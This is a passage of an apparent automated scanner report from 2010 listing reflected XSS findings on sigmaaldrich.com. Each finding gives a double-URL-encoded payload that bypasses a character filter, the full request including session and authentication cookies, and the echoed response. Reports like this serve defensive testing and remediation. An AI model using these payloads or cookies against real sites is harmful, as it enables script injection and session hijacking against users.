                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/198bd";alert(1)//cca3778b57c","E404") ;
   </script>
...[SNIP]...

1.600. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/polymer-science.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaca7%2522%253balert%25281%2529%252f%252fe57571f4744 was submitted in the REST URL parameter 1. This input was echoed as aaca7";alert(1)//e57571f4744 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-scienceaaca7%2522%253balert%25281%2529%252f%252fe57571f4744/polymer-science.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:47 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceaaca7";alert(1)//e57571f4744/polymer-science.html","E404") ;
   </script>
...[SNIP]...

1.601. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/polymer-science.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bea%2522%253balert%25281%2529%252f%252fbafea584e76 was submitted in the REST URL parameter 2. This input was echoed as 77bea";alert(1)//bafea584e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/77bea%2522%253balert%25281%2529%252f%252fbafea584e76 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:49 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/77bea";alert(1)//bafea584e76","E404") ;
   </script>
...[SNIP]...

1.602. http://www.sigmaaldrich.com/materials-science/renewable-alternative-energy.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/renewable-alternative-energy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 594ca%2522%253balert%25281%2529%252f%252fb6042505d08 was submitted in the REST URL parameter 1. This input was echoed as 594ca";alert(1)//b6042505d08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science594ca%2522%253balert%25281%2529%252f%252fb6042505d08/renewable-alternative-energy.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science594ca";alert(1)//b6042505d08/renewable-alternative-energy.html","E404") ;
   </script>
...[SNIP]...

1.603. http://www.sigmaaldrich.com/safc-global/en-us/home.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /safc-global/en-us/home.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f65f%2522%253balert%25281%2529%252f%252f4ba4f311f57 was submitted in the REST URL parameter 1. This input was echoed as 9f65f";alert(1)//4ba4f311f57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /9f65f%2522%253balert%25281%2529%252f%252f4ba4f311f57/en-us/home.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:49 GMT
Content-Length: 28920
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/9f65f";alert(1)//4ba4f311f57/en-us/home.html","E404") ;
   </script>
...[SNIP]...

1.604. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f58d9%2522%253balert%25281%2529%252f%252f321e593d89b was submitted in the REST URL parameter 1. This input was echoed as f58d9";alert(1)//321e593d89b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrichf58d9%2522%253balert%25281%2529%252f%252f321e593d89b/help/help-welcome/ordering-product/favorites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:16 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrichf58d9";alert(1)//321e593d89b/help/help-welcome/ordering-product/favorites.html","E404") ;
   </script>
...[SNIP]...

1.605. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc6c7%2522%253balert%25281%2529%252f%252f7f7383024f7 was submitted in the REST URL parameter 2. This input was echoed as bc6c7";alert(1)//7f7383024f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

